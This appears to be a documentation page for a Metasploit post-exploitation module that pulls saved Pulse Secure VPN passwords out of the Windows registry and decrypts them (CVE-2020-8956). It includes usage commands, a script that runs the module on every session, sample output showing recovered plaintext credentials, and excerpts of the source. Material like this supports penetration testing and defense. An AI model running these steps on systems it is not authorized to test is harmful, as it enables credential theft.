Windows Pulse Secure Connect Client Saved Password Extractor - Metasploit


This page contains detailed information about how to use the post/windows/gather/credentials/pulse_secure metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Table Of Contents
hide

Module Overview

Name: Windows Pulse Secure Connect Client Saved Password Extractor
Module: post/windows/gather/credentials/pulse_secure
Source code: modules/post/windows/gather/credentials/pulse_secure.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2020-8956

This module extracts and decrypts saved Pulse Secure Connect Client passwords from the Windows Registry. This module can only access credentials created by the user that the Meterpreter session is running as. Note that this module cannot link the password to a username unless the Meterpreter sessions is running as SYSTEM. This is because the username associated with a password is saved in 'C:\ProgramData\Pulse Secure\ConnectionStore[SID].dat', which is only readable by SYSTEM. Note that for enterprise deployment, this username is almost always the domain username.

Module Ranking and Traits

Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage

There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/windows/gather/credentials/pulse_secure

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/windows/gather/credentials/pulse_secure
msf post(pulse_secure) > show options
    ... show and set options ...
msf post(pulse_secure) > set SESSION session-id
msf post(pulse_secure) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/gather/credentials/pulse_secure")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options

  • SESSION: The session to run this module on.

Knowledge Base

Vulnerable Application

Pulse Secure VPN Client for versions 9.1 prior to 9.1R4 and 9.0 prior to 9.0R5.

An end-to-end setup with working Juniper Pulse Secure VPN server, Pulse Secure client on Microsoft Windows, and valid credentials are required for Pulse Secure client to save credentials locally and therefore test this.

Verification Steps

  1. Get a Meterpreter shell on a Windows machine that has Pulse Secure client installed.
  2. Load the module: use post/windows/gather/credentials/pulse_secure
  3. Set the correct session on the module: set SESSION *session id*
  4. Run the module with run and enjoy the loot.

Scenarios

The command for all scenarios is the same:

msf > use post/windows/gather/credentials/pulse_secure
msf > set SESSION 1
msf > run

If you wish to run the post module against all sessions from framework, here is how:

  1. Create the following resource script: framework.sessions.each_pair do |sid, session| run_single("use post/windows/gather/credentials/pulse_secure") run_single("set SESSION #{sid}") run_single("run") end
  2. At the msf prompt, execute the above resource script: msf > resource path-to-resource-script

Pulse Secure 9.0.4 on Microsoft Windows 10 Enterprise 19042

msf6 post(windows/gather/credentials/pulse_secure) > run

[*] Target is running Pulse Secure Connect build 9.0.4.1731.
[+] This version is considered vulnerable.
[*] Running credentials acquisition.
[+] Account found
[*]      Username: 
[*]      Password: John2020!!
[*]      URI: https://vpn.contoso.local
[*]      Name: Contoso VPN
[*]      Source: user
[*] Post module execution completed

Pulse Secure 9.0.5 on Microsoft Windows 10 Enterprise 19042

With leftovers from previously installed version (9.0.4):

msf6 post(windows/gather/credentials/pulse_secure) > run

[*] Target is running Pulse Secure Connect build 9.0.5.1907.
[!] You're executing from an unprivileged process so this version is considered safe.
[!] However, there might be leftovers from previous versions in the registry.
[!] We recommend running this script in elevated mode to obtain credentials saved by recent versions.
[*] Running credentials acquisition.
[+] Account found
[*]      Username:
[*]      Password: John2020!!
[*]      URI: https://vpn.contoso.local
[*]      Name: Contoso VPN
[*]      Source: user
[*] Post module execution completed

Without any leftovers from previously installed versions:

msf6 post(windows/gather/credentials/pulse_secure) > run

[*] Target is running Pulse Secure Connect build 9.0.5.1907.
[!] You're executing from an unprivileged process so this version is considered safe.
[!] However, there might be leftovers from previous versions in the registry.
[!] We recommend running this script in elevated mode to obtain credentials saved by recent versions.
[*] Running credentials acquisition.
[*] Post module execution completed

Pulse Secure 9.0.5 on Microsoft Windows 10 Enterprise 19042 (Elevated)

msf6 post(windows/gather/credentials/pulse_secure) > run

[*] Target is running Pulse Secure Connect build 9.0.5.1907.
[+] You're executing from a privileged process so this version is considered vulnerable.
[*] Running credentials acquisition.
[+] Account found
[*]      Username: [email protected]
[*]      Password: John2020!!
[*]      URI: https://vpn.contoso.local
[*]      Name: Contoso VPN
[*]      Source: user
[*] Post module execution completed

Pulse Secure 9.1.3 on Microsoft Windows 10 Enterprise 19042

msf6 post(windows/gather/credentials/pulse_secure) > run

[*] Target is running Pulse Secure Connect build 9.1.3.1313.
[+] This version is considered vulnerable.
[*] Running credentials acquisition.
[+] Account found
[*]      Username:
[*]      Password: John2020!!
[*]      URI: https://vpn.contoso.local
[*]      Name: Contoso VPN
[*]      Source: user
[*] Post module execution completed

Pulse Secure 9.1.4 on Microsoft Windows 10 Enterprise 19042

With leftovers from previously installed version (9.1.3):

msf6 post(windows/gather/credentials/pulse_secure) > run

[*] Target is running Pulse Secure Connect build 9.1.4.1955.
[!] You're executing from an unprivileged process so this version is considered safe.
[!] However, there might be leftovers from previous versions in the registry.
[!] We recommend running this script in elevated mode to obtain credentials saved by recent versions.
[*] Running credentials acquisition.
[+] Account found
[*]      Username: 
[*]      Password: John2020!!
[*]      URI: https://vpn.contoso.local
[*]      Name: Contoso VPN
[*]      Source: user
[*] Post module execution completed

Without leftovers:

msf6 post(windows/gather/credentials/pulse_secure) > run

[*] Target is running Pulse Secure Connect build 9.1.4.1955.
[!] You're executing from an unprivileged process so this version is considered safe.
[!] However, there might be leftovers from previous versions in the registry.
[!] We recommend running this script in elevated mode to obtain credentials saved by recent versions.
[*] Running credentials acquisition.
[*] Post module execution completed

Pulse Secure 9.1.4 on Microsoft Windows 10 Enterprise 19042 (Elevated)

msf6 post(windows/gather/credentials/pulse_secure) > run

[*] Target is running Pulse Secure Connect build 9.1.4.1955.
[+] You're executing from a privileged process so this version is considered vulnerable.
[*] Running credentials acquisition.
[+] Account found
[*]      Username: [email protected]
[*]      Password: John2020!!
[*]      URI: https://vpn.contoso.local
[*]      Name: Contoso VPN
[*]      Source: user
[*] Post module execution completed

Host without Pulse Secure

msf6 post(windows/gather/credentials/pulse_secure) > run

[-] Pulse Secure Connect client is not installed on this system
[*] Post module execution completed

References

  • https://qkaiser.github.io/reversing/2020/10/27/pule-secure-credentials
  • https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601

Go back to menu.

Msfconsole Usage

Here is how the windows/gather/credentials/pulse_secure post exploitation module looks in the msfconsole:

msf6 > use post/windows/gather/credentials/pulse_secure

msf6 post(windows/gather/credentials/pulse_secure) > show info

       Name: Windows Pulse Secure Connect Client Saved Password Extractor
     Module: post/windows/gather/credentials/pulse_secure
   Platform: Windows
       Arch: 
       Rank: Normal

Provided by:
  Quentin Kaiser <[email protected]>

Compatible session types:
  Meterpreter

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  This module extracts and decrypts saved Pulse Secure Connect Client 
  passwords from the Windows Registry. This module can only access 
  credentials created by the user that the Meterpreter session is 
  running as. Note that this module cannot link the password to a 
  username unless the Meterpreter sessions is running as SYSTEM. This 
  is because the username associated with a password is saved in 
  'C:\ProgramData\Pulse Secure\ConnectionStore\[SID].dat', which is 
  only readable by SYSTEM. Note that for enterprise deployment, this 
  username is almost always the domain username.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2020-8956
  https://qkaiser.github.io/reversing/2020/10/27/pule-secure-credentials
  https://www.gremwell.com/blog/reversing_pulse_secure_client_credentials_store
  https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601

Module Options

This is a complete list of options available in the windows/gather/credentials/pulse_secure post exploitation module:

msf6 post(windows/gather/credentials/pulse_secure) > show options

Module options (post/windows/gather/credentials/pulse_secure):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Advanced Options

Here is a complete list of advanced options supported by the windows/gather/credentials/pulse_secure post exploitation module:

msf6 post(windows/gather/credentials/pulse_secure) > show advanced

Module advanced options (post/windows/gather/credentials/pulse_secure):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions

This is a list of all post exploitation actions which the windows/gather/credentials/pulse_secure module can do:

msf6 post(windows/gather/credentials/pulse_secure) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options

Here is the full list of possible evasion options supported by the windows/gather/credentials/pulse_secure post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(windows/gather/credentials/pulse_secure) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages

This module may fail with the following error messages:

Error Messages

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

No credentials were found.

Here is a relevant code snippet related to the "No credentials were found." error message:

277:	
278:	  def gather_creds
279:	    print_status('Running credentials acquisition.')
280:	    ives = find_creds
281:	    if ives.empty?
282:	      print_status('No credentials were found.')
283:	    end
284:	    return unless ives.any?
285:	
286:	    ives.each do |ive|
287:	      ive['creds'].each do |creds|

Pulse Secure Connect client is not installed on this system

Here is a relevant code snippet related to the "Pulse Secure Connect client is not installed on this system" error message:

347:	  #
348:	  def check
349:	    version_path = 'C:\\Program Files (x86)\\Pulse Secure\\Pulse\\versionInfo.ini'
350:	    begin
351:	      if !session.fs.file.exist?(version_path)
352:	        print_error('Pulse Secure Connect client is not installed on this system')
353:	        return Msf::Exploit::CheckCode::Safe
354:	      end
355:	      version_file = begin
356:	        session.fs.file.open(version_path)
357:	      rescue StandardError

Cannot open Pulse Secure Connect version file.

Here is a relevant code snippet related to the "Cannot open Pulse Secure Connect version file." error message:

356:	        session.fs.file.open(version_path)
357:	      rescue StandardError
358:	        nil
359:	      end
360:	      if version_file.nil?
361:	        print_error('Cannot open Pulse Secure Connect version file.')
362:	        return Msf::Exploit::CheckCode::Unknown
363:	      end
364:	      version_data = version_file.read.to_s
365:	      version_file.close
366:	      matches = version_data.scan(/DisplayVersion=([0-9.]+)/m)

You're executing from an unprivileged process so this version is considered safe.

Here is a relevant code snippet related to the "You're executing from an unprivileged process so this version is considered safe." error message:

374:	      if is_system?
375:	        print_good("You're executing from a privileged process so this version is considered vulnerable.")
376:	        return Msf::Exploit::CheckCode::Vulnerable
377:	      end
378:	
379:	      print_warning("You're executing from an unprivileged process so this version is considered safe.")
380:	      print_warning('However, there might be leftovers from previous versions in the registry.')
381:	      print_warning('We recommend running this script in elevated mode to obtain credentials saved by recent versions.')
382:	      return Msf::Exploit::CheckCode::Appears
383:	    rescue Rex::Post::Meterpreter::RequestError => e
384:	      vprint_error(e.message)

However, there might be leftovers from previous versions in the registry.

Here is a relevant code snippet related to the "However, there might be leftovers from previous versions in the registry." error message:

375:	        print_good("You're executing from a privileged process so this version is considered vulnerable.")
376:	        return Msf::Exploit::CheckCode::Vulnerable
377:	      end
378:	
379:	      print_warning("You're executing from an unprivileged process so this version is considered safe.")
380:	      print_warning('However, there might be leftovers from previous versions in the registry.')
381:	      print_warning('We recommend running this script in elevated mode to obtain credentials saved by recent versions.')
382:	      return Msf::Exploit::CheckCode::Appears
383:	    rescue Rex::Post::Meterpreter::RequestError => e
384:	      vprint_error(e.message)
385:	    end

We recommend running this script in elevated mode to obtain credentials saved by recent versions.

Here is a relevant code snippet related to the "We recommend running this script in elevated mode to obtain credentials saved by recent versions." error message:

376:	        return Msf::Exploit::CheckCode::Vulnerable
377:	      end
378:	
379:	      print_warning("You're executing from an unprivileged process so this version is considered safe.")
380:	      print_warning('However, there might be leftovers from previous versions in the registry.')
381:	      print_warning('We recommend running this script in elevated mode to obtain credentials saved by recent versions.')
382:	      return Msf::Exploit::CheckCode::Appears
383:	    rescue Rex::Post::Meterpreter::RequestError => e
384:	      vprint_error(e.message)
385:	    end
386:	  end

Go back to menu.

References

See Also

Check also the following modules related to this module:

Authors

  • Quentin Kaiser <kaiserquentin[at]gmail.com>

Version

This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.